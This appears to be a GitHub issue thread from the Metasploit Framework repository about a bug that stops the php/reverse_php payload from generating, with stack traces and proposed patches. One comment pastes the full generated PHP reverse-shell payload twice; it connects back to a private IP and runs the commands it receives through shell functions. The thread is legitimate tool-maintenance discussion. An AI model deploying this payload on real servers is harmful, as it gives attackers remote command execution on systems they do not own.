metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard
verified publisher icon rapid7

Payload not working php/reverse_php

Open RnRStone opened this issue 4 months ago • 9 comments

Steps to reproduce

How'd you do it? $ msfvenom -p php/reverse_php LHOST=tun0 LPORT=443 -f raw

Expected behavior

Print output

Current behavior

msfvenom and msfconsole will not output using payload(php/reverse_php) as it states "language option php is not supported."

└─$ msfvenom -p php/reverse_php LHOST=tun0 LPORT=443 -f raw --encoder none [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload Error: Language option php is not supported. Expected one of [:default, :java, :jsp, :javascript, :python, :powershell]

Metasploit version

Framework Version: 6.4.88-dev-

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse 
[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=payload/php/reverse_php

[php/reverse_php]
LHOST=192.168.1.1
WORKSPACE=
VERBOSE=false
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
InitialAutoRunScript=
AutoRunScript=
CommandShellCleanupCommand=
AutoVerifySession=true

Database Configuration

The database contains the following information:

Collapse 
Session Type: Connected to msf. Connection type: postgresql.
ID Hosts Vulnerabilities Notes Services
1 (Current) 0 0 0 0
Total (1) 0 0 0 0

Framework Configuration

The features are configured as follows:

Collapse
name enabled
wrapped_tables true
fully_interactive_shells false
manager_commands false
metasploit_payload_warnings true
defer_module_loads true
smb_session_type true
postgresql_session_type true
mysql_session_type true
mssql_session_type true
ldap_session_type true
show_successful_logins false
dns true
hierarchical_search_table true
display_module_action true

History

The following commands were ran during the session and before this issue occurred:

Collapse 
182    set loglevel 3
183    use php/reverse_php
184    options
185    set LHOST 192.168.1.1
186    generate
187    debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse 

[09/12/2025 12:19:54] [e(0)] core: ArgumentError : Language option php is not supported. Expected one of [:default, :java, :jsp, :javascript, :python, :powershell]
/opt/metasploit-framework/embedded/lib/ruby/gems/3.4.0/gems/rex-random_identifier-0.1.20/lib/rex/random_identifier/generator.rb:290:in 'Rex::RandomIdentifier::Generator#initialize'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'Class#new'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'block in Msf::Payload::Php.preamble'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'Hash#fetch'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'Msf::Payload::Php.preamble'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:42:in 'Msf::Payload::Php#php_preamble'
/opt/metasploit-framework/embedded/framework/modules/payloads/singles/php/reverse_php.rb:61:in 'Msf::Modules::Payload__Singles__Php__Reverse_php::MetasploitModule#php_reverse_shell'
/opt/metasploit-framework/embedded/framework/modules/payloads/singles/php/reverse_php.rb:124:in 'Msf::Modules::Payload__Singles__Php__Reverse_php::MetasploitModule#generate'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload.rb:300:in 'Msf::Payload#generate_complete'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:118:in 'Msf::EncodedPayload#generate_raw'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:74:in 'Msf::EncodedPayload#generate'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:24:in 'Msf::EncodedPayload.create'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/payload.rb:52:in 'Msf::Simple::Payload.generate_simple'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/payload.rb:139:in 'Msf::Simple::Payload#generate_simple'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload_generator.rb:478:in 'Msf::PayloadGenerator#generate_raw_payload'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload_generator.rb:422:in 'Msf::PayloadGenerator#generate_payload'
/opt/metasploit-framework/bin/../embedded/framework/msfvenom:477:in '<main>'

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse 
msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse 
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'block in Msf::Payload::Php.preamble'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'Hash#fetch'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'Msf::Payload::Php.preamble'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:42:in 'Msf::Payload::Php#php_preamble'
/opt/metasploit-framework/embedded/framework/modules/payloads/singles/php/reverse_php.rb:61:in 'Msf::Modules::Payload__Singles__Php__Reverse_php::MetasploitModule#php_reverse_shell'
/opt/metasploit-framework/embedded/framework/modules/payloads/singles/php/reverse_php.rb:124:in 'Msf::Modules::Payload__Singles__Php__Reverse_php::MetasploitModule#generate'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload.rb:300:in 'Msf::Payload#generate_complete'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:118:in 'Msf::EncodedPayload#generate_raw'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:74:in 'Msf::EncodedPayload#generate'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:24:in 'Msf::EncodedPayload.create'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/payload.rb:52:in 'Msf::Simple::Payload.generate_simple'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/payload.rb:139:in 'Msf::Simple::Payload#generate_simple'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload_generator.rb:478:in 'Msf::PayloadGenerator#generate_raw_payload'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload_generator.rb:422:in 'Msf::PayloadGenerator#generate_payload'
/opt/metasploit-framework/bin/../embedded/framework/msfvenom:477:in '<main>'
[09/12/2025 12:38:14] [i(2)] core: Reloading payload module php/reverse_php. Ambiguous module warnings are safe to ignore
[09/12/2025 12:38:14] [i(2)] core: Reloading payload module singles/php/reverse_php. Ambiguous module warnings are safe to ignore
[09/12/2025 12:38:14] [d(2)] core: Built single payload php/reverse_php.
[09/12/2025 12:40:52] [i(2)] core: Reloading payload module php/reverse_php. Ambiguous module warnings are safe to ignore
[09/12/2025 12:40:52] [i(2)] core: Reloading payload module singles/php/reverse_php. Ambiguous module warnings are safe to ignore
[09/12/2025 12:40:52] [d(2)] core: Built single payload php/reverse_php.
[09/12/2025 12:41:00] [w(0)] core: Payload generation failed: Language option php is not supported. Expected one of [:default, :java, :jsp, :javascript, :python, :powershell]
[09/12/2025 12:41:00] [d(1)] core: Call stack:
/opt/metasploit-framework/embedded/lib/ruby/gems/3.4.0/gems/rex-random_identifier-0.1.20/lib/rex/random_identifier/generator.rb:290:in 'Rex::RandomIdentifier::Generator#initialize'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'Class#new'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'block in Msf::Payload::Php.preamble'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'Hash#fetch'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:20:in 'Msf::Payload::Php.preamble'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload/php.rb:42:in 'Msf::Payload::Php#php_preamble'
/opt/metasploit-framework/embedded/framework/modules/payloads/singles/php/reverse_php.rb:61:in 'Msf::Modules::Payload__Singles__Php__Reverse_php::MetasploitModule#php_reverse_shell'
/opt/metasploit-framework/embedded/framework/modules/payloads/singles/php/reverse_php.rb:124:in 'Msf::Modules::Payload__Singles__Php__Reverse_php::MetasploitModule#generate'
/opt/metasploit-framework/embedded/framework/lib/msf/core/payload.rb:300:in 'Msf::Payload#generate_complete'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:118:in 'Msf::EncodedPayload#generate_raw'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:74:in 'Msf::EncodedPayload#generate'
/opt/metasploit-framework/embedded/framework/lib/msf/core/encoded_payload.rb:24:in 'Msf::EncodedPayload.create'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/payload.rb:52:in 'Msf::Simple::Payload.generate_simple'
/opt/metasploit-framework/embedded/framework/lib/msf/base/simple/payload.rb:139:in 'Msf::Simple::Payload#generate_simple'
/opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/payload.rb:219:in 'Msf::Ui::Console::CommandDispatcher::Payload#cmd_generate'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:582:in 'Rex::Ui::Text::DispatcherShell#run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:531:in 'block in Rex::Ui::Text::DispatcherShell#run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:525:in 'Array#each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:525:in 'Rex::Ui::Text::DispatcherShell#run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:165:in 'block in Rex::Ui::Text::Shell#run'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:309:in 'block in Rex::Ui::Text::Shell#with_history_manager_context'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell/history_manager.rb:35:in 'Rex::Ui::Text::Shell::HistoryManager#with_context'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:306:in 'Rex::Ui::Text::Shell#with_history_manager_context'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:133:in 'Rex::Ui::Text::Shell#run'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:54:in 'Metasploit::Framework::Command::Console#start'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in 'Metasploit::Framework::Command::Base.start'
/opt/metasploit-framework/bin/../embedded/framework/msfconsole:23:in '<main>'

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse 
msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse 
Framework: 6.4.88-dev-
Ruby: ruby 3.4.4 (2025-05-14 revision a38531fd3f) +PRISM [x86_64-linux]
OpenSSL: OpenSSL 1.1.1t  7 Feb 2023
Install Root: /opt/metasploit-framework/embedded/framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Omnibus Installer

RnRStone avatar Sep 12 '25 17:09 RnRStone

I am using metasploit v6.4.69-dev. It works on both msfconsole and msfvenom for me: msfvenom

[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 2638 bytes
    /*<?php /**/
@error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
  $dis=preg_replace('/[, ]+/',',',$dis);
  $dis=explode(',',$dis);
  $dis=array_map('trim',$dis);
}else{
  $dis=array();
}

    $ipaddr='192.168.1.44';
    $port=443;

    if(!function_exists('MOjOC')){
      function MOjOC($c){
        global $dis;
        if (FALSE!==stristr(PHP_OS,'win')){
  $c=$c." 2>&1\n";
}
$joka='is_callable';
$IElr2DvsBR='in_array';
if($joka('popen')&&!$IElr2DvsBR('popen',$dis)){
  $fp=popen($c,'r');
  $o=NULL;
  if(is_resource($fp)){
    while(!feof($fp)){
      $o.=fread($fp,1024);
    }
  }
  @pclose($fp);
}else
if($joka('shell_exec')&&!$IElr2DvsBR('shell_exec',$dis)){
  $o=`$c`;
}else
if($joka('proc_open')&&!$IElr2DvsBR('proc_open',$dis)){
  $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
  $o=NULL;
  while(!feof($pipes[1])){
    $o.=fread($pipes[1],1024);
  }
  @proc_close($handle);
}else
if($joka('system')&&!$IElr2DvsBR('system',$dis)){
  ob_start();
  system($c);
  $o=ob_get_contents();
  ob_end_clean();
}else
if($joka('passthru')&&!$IElr2DvsBR('passthru',$dis)){
  ob_start();
  passthru($c);
  $o=ob_get_contents();
  ob_end_clean();
}else
if($joka('exec')&&!$IElr2DvsBR('exec',$dis)){
  $o=array();
  exec($c,$o);
  $o=join(chr(10),$o).chr(10);
}else
{
  $o=0;
}

        return $o;
      }
    }
    $nofuncs='no exec functions';
    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
      $s=@fsockopen("tcp://192.168.1.44",$port);
      while($c=fread($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=MOjOC(substr($c,0,-1));
          if($out===false){
            fwrite($s,$nofuncs);
            break;
          }
        }
        fwrite($s,$out);
      }
      fclose($s);
    }else{
      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
      @socket_connect($s,$ipaddr,$port);
      @socket_write($s,"socket_create");
      while($c=@socket_read($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=MOjOC(substr($c,0,-1));
          if($out===false){
            @socket_write($s,$nofuncs);
            break;
          }
        }
        @socket_write($s,$out,strlen($out));
      }
      @socket_close($s);
    }

msfconsole

msf6 payload(php/reverse_php) > set lhost 192.168.1.13
lhost => 192.168.1.13
msf6 payload(php/reverse_php) > set lport 4444
lport => 4444
msf6 payload(php/reverse_php) > generate -f raw
    /*<?php /**/
@error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
  $dis=preg_replace('/[, ]+/',',',$dis);
  $dis=explode(',',$dis);
  $dis=array_map('trim',$dis);
}else{
  $dis=array();
}

    $ipaddr='192.168.1.13';
    $port=4444;

    if(!function_exists('aIulbM')){
      function aIulbM($c){
        global $dis;
        if (FALSE!==stristr(PHP_OS,'win')){
  $c=$c." 2>&1\n";
}
$JgF1NeH='is_callable';
$FYnUlhauJ4='in_array';
if($JgF1NeH('passthru')&&!$FYnUlhauJ4('passthru',$dis)){
  ob_start();
  passthru($c);
  $o=ob_get_contents();
  ob_end_clean();
}else
if($JgF1NeH('shell_exec')&&!$FYnUlhauJ4('shell_exec',$dis)){
  $o=`$c`;
}else
if($JgF1NeH('popen')&&!$FYnUlhauJ4('popen',$dis)){
  $fp=popen($c,'r');
  $o=NULL;
  if(is_resource($fp)){
    while(!feof($fp)){
      $o.=fread($fp,1024);
    }
  }
  @pclose($fp);
}else
if($JgF1NeH('exec')&&!$FYnUlhauJ4('exec',$dis)){
  $o=array();
  exec($c,$o);
  $o=join(chr(10),$o).chr(10);
}else
if($JgF1NeH('proc_open')&&!$FYnUlhauJ4('proc_open',$dis)){
  $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
  $o=NULL;
  while(!feof($pipes[1])){
    $o.=fread($pipes[1],1024);
  }
  @proc_close($handle);
}else
if($JgF1NeH('system')&&!$FYnUlhauJ4('system',$dis)){
  ob_start();
  system($c);
  $o=ob_get_contents();
  ob_end_clean();
}else
{
  $o=0;
}

        return $o;
      }
    }
    $nofuncs='no exec functions';
    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
      $s=@fsockopen("tcp://192.168.1.13",$port);
      while($c=fread($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=aIulbM(substr($c,0,-1));
          if($out===false){
            fwrite($s,$nofuncs);
            break;
          }
        }
        fwrite($s,$out);
      }
      fclose($s);
    }else{
      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
      @socket_connect($s,$ipaddr,$port);
      @socket_write($s,"socket_create");
      while($c=@socket_read($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=aIulbM(substr($c,0,-1));
          if($out===false){
            @socket_write($s,$nofuncs);
            break;
          }
        }
        @socket_write($s,$out,strlen($out));
      }
      @socket_close($s);
    }
msf6 payload(php/reverse_php) >```

xHector1337 avatar Sep 13 '25 09:09 xHector1337

Alright, I've updated my metasploit and i faced the same problem. I'll investigate further.

msf payload(php/reverse_php) > set lhost 192.168.1.4
lhost => 192.168.1.4
msf payload(php/reverse_php) > set lhost 192.168.1.44
lhost => 192.168.1.44
msf payload(php/reverse_php) > set lport 1337
lport => 1337
msf payload(php/reverse_php) > generate 
[-] Payload generation failed: Language option php is not supported. Expected one of [:default, :java, :jsp, :javascript, :python, :powershell]
msf payload(php/reverse_php) > generate -f raw
[-] Payload generation failed: Language option php is not supported. Expected one of [:default, :java, :jsp, :javascript, :python, :powershell]
msf payload(php/reverse_php) >

xHector1337 avatar Sep 13 '25 09:09 xHector1337

Alright, I've found the source of the problem. Openning a PR!

xHector1337 avatar Sep 13 '25 10:09 xHector1337

Hi. Got the same issue with payload for Framework Version: 6.4.92-dev-05c854b, but also it reproducible by msfvenom --list payloads.

With the following patch:

diff --git a/msfvenom b/msfvenom
index b5ccac5..f915893 100755
--- a/msfvenom
+++ b/msfvenom
@@ -205,6 +205,7 @@ def parse_args(args)
     raise UsageError, "Missing required argument for option\n#{opt}"
   end

+  print(opts, )
   if opts.empty?
     raise UsageError, "No options\n#{opt}"
   end

prints out {list: ["payloads"]}{}. Looks like parse_args was been called twice, at least it looks weird.

UPD: something goes wrong within init_framework>require_deps call inside of dump_payloads.

UPD2: the following patch make working msfvenom, but I'm not sure that it is correct way:

diff --git a/msfvenom b/msfvenom
index b5ccac5cc..9cb615678 100755
--- a/msfvenom
+++ b/msfvenom
@@ -23,6 +23,8 @@ $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
 require 'metasploit/framework/profiler'
 Metasploit::Framework::Profiler.start

+require 'msfenv'
+
 def require_deps
   require 'msfenv'

theg4sh avatar Oct 05 '25 16:10 theg4sh

wow @theg4sh , that's interesting. The problem I fixed was caused by rex-random_identifier library but this is surely interesting too. I will research further as soon as I have some spare time. Thanks!

xHector1337 avatar Oct 05 '25 17:10 xHector1337

@theg4sh If you have some kind of patch you've made, you can just open a pull request so r7 team can check it out!

xHector1337 avatar Oct 05 '25 17:10 xHector1337

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] avatar Nov 05 '25 15:11 github-actions[bot]

Well, I still haven't checked the last comment. I will hopefully. I think it should stay open.

xHector1337 avatar Nov 05 '25 15:11 xHector1337

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] avatar Dec 08 '25 15:12 github-actions[bot]